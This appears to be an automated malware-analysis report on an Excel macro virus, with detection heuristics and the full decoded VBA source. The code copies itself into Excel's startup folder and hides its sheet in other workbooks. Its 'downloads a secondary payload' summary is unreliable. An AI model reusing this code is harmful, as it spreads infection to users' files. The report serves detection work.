Verdict: MALICIOUS
Risk Score: 88

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment

This Excel document contains a VBA macro that is triggered by the 'auto_open' subroutine. The macro attempts to save a copy of itself as 'ICEBOOK.XLS' in the startup path, and then appears to prepare for further execution. The ClamAV detection name 'Xls.Dropper.Agent-1633146' strongly suggests this is a dropper malware designed to download and execute a secondary payload.

Heuristics 3
- ClamAV: Xls.Dropper.Agent-1633146 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.Agent-1633146
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Auto_Open macro (low, OLE_VBA_AUTO): Auto_Open macro. Matched line in script: `Sub auto_open()`

Extracted artifacts 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1837 bytes |

SHA-256: 816984d0f10020575f5559f5cdef52179027d4e8a6550d76bc0024307aa7f767

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Ice"
' Ice-LC's work! Do you like it?
' 25 Jan 1999. С днём студента!
' Bonne voyage!
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnWindow = "ice_action"
End Sub
Sub ice_action()
Attribute ice_action.VB_Description = "0"
Attribute ice_action.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim c As String, ab As String, newname As String
    Dim ib As Integer, wb As Integer, i As Integer
    On Error Resume Next
    c$ = Application.StartupPath
    If Dir(c$ & "\" & "ICEBOOK.XLS") = "ICEBOOK.XLS" Then ib = 1 Else ib = 0
    wb = 0
    For i = ActiveWorkbook.Modules.Count To 1 Step -1
        If ActiveWorkbook.Modules(i).name = "Ice" Then
            wb = 2
            Exit For
        End If
    Next i
    ab$ = ActiveWorkbook.name
    Select Case ib + wb
    Case 1
        Application.ScreenUpdating = False
        Workbooks("ICEBOOK.XLS").Sheets("Ice").Copy before:= _
            Workbooks(ab$).Sheets(1)
        Workbooks(ab$).Sheets("Ice").Visible = False
        Application.ScreenUpdating = True
    Case 2
        Application.ScreenUpdating = False
        Sheets("Ice").Visible = True
        Sheets("Ice").Copy
        With ActiveWorkbook
            .title = ""
            .Subject = ""
            .Author = ""
            .Keywords = ""
            .Comments = ""
        End With
        newname$ = ActiveWorkbook.name
        ActiveWindow.Visible = False
        Err = 0
        Workbooks(newname$).SaveAs Filename:=c$ & "\" & _
            "ICEBOOK.XLS", FileFormat:=xlNormal, Password:="", _
            WriteResPassword:="", ReadOnlyRecommended:=False, _
            CreateBackup:=False
        If Err = 0 Then Application.OnWindow = "icebook.xls!ice_action"
        Sheets("Ice").Visible = False
        Application.ScreenUpdating = True
    End Select
End Sub
```